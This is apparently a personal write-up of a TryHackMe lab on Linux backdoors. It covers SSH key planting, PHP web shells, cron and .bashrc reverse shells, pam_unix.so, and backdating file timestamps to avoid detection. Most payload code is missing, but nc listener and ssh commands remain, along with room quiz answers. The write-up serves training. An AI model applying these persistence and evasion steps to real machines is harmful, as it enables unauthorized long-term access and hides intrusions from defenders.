search
Home

Linux Backdoors

Date: 17, May, 2021

Author: Dhilip Sanjay S

Click Herearrow-up-right to go to the TryHackMe room.

hashtag
Introduction

  • A backdoor is simply something we can do to ensure our consistent access to the machine.

  • So even if the machine is rebooted, shut down or whatever, we would still be able to have access to it.

hashtag
SSH Backdoors

  • The ssh backdoor essentially consists of leaving our ssh keys in some user’s home directory. Usually the user would be root as it’s the user with the highest privileges.

  • Steps:

    1. Run ssh-keygen in your local machine.

    2. Add the public key to authorized_keys in the root/.ssh directory of the target machine.

      • Ensure proper permissions: chmod 600 ~/.ssh/authorized_keys

    3. Now that we have left our backdoor, we can simply login as root using the following commands:

      • chmod 600 id_rsa (This is necessary because if we don't do it, ssh will complain about permissions not being secure enough on the key)

      • ssh -i id_rsa root@ip to login into our desired machine.

  • Note: This backdoor isn't hidden at all. Anybody with the right permissions would be able to remove our ssh public key or the file authorized_keys entirely.

hashtag
In what directory do we place our keys ?

  • Answer: .ssh

hashtag
What flag in ssh do we use to show our private key?

  • Answer: -i

hashtag
PHP Backdoors

  • If you get root access on a Linux host, you will most likely search for creds and or any useful information in the web root. The web root is usually located in : /var/www/html.

  • You can create a php file with any name and put the following piece of code:

  • Notice that we are using : $_REQUEST['cmd']), which means that you can pass that parameter either in GET or in POST data.

  • To access the shell:

  • Here are some ways that we could make this backdoor a little more hidden:

hashtag
CronJob Backdoors

  • View the contents of /etc/crontab:

  • This represents all the tasks that are scheduled to run at some time on your machine.

  • In the example above, you can see that there is a "*" symbol under the "h". This means that the following task would run every hour.

  • Add this line into our cronjob file (* for everything -> our task will run every minute, every hour, every day , etc.):

  • The contents of the shell file:

  • We would have to run an HTTP server serving our shell using python3 -m http.server 8080

  • Don't forget to listen on your specified port with: nc -lvnp <port>

  • Note: Please note that this backdoor isn't really hidden because everyone can see it just by looking inside /etc/crontab.

hashtag
What does the letter "m" mean in cronjobs?

  • Answer: minute

hashtag
What does the letter "h" mean in cronjobs?

  • Answer: hour

hashtag
.bashrc Backdoors

  • If a user has bash as their login shell, the .bashrc file in their home directory is executed when an interactive session is launched.

  • You could simply run this command to include your reverse shell into their .bashrc.

  • Note:

    • One important thing is to always have your nc listener ready as you don't know when your user will log on.

    • This attack is very sneaky as nobody really thinks about ever checking their .bashrc file.

    • On the other hand, you can't exactly know if any of the user's will actually login to their system, so you might really wait a long period of time.

hashtag
pam_unix.so Backdoors

hashtag
Making Detection More Difficult

  • To make detection of all of these backdoors more difficult one can adjust modification time of the created files (this is what ls command shows) to a past date:

hashtag
References

PreviousKenobiNextRoot Me

Last updated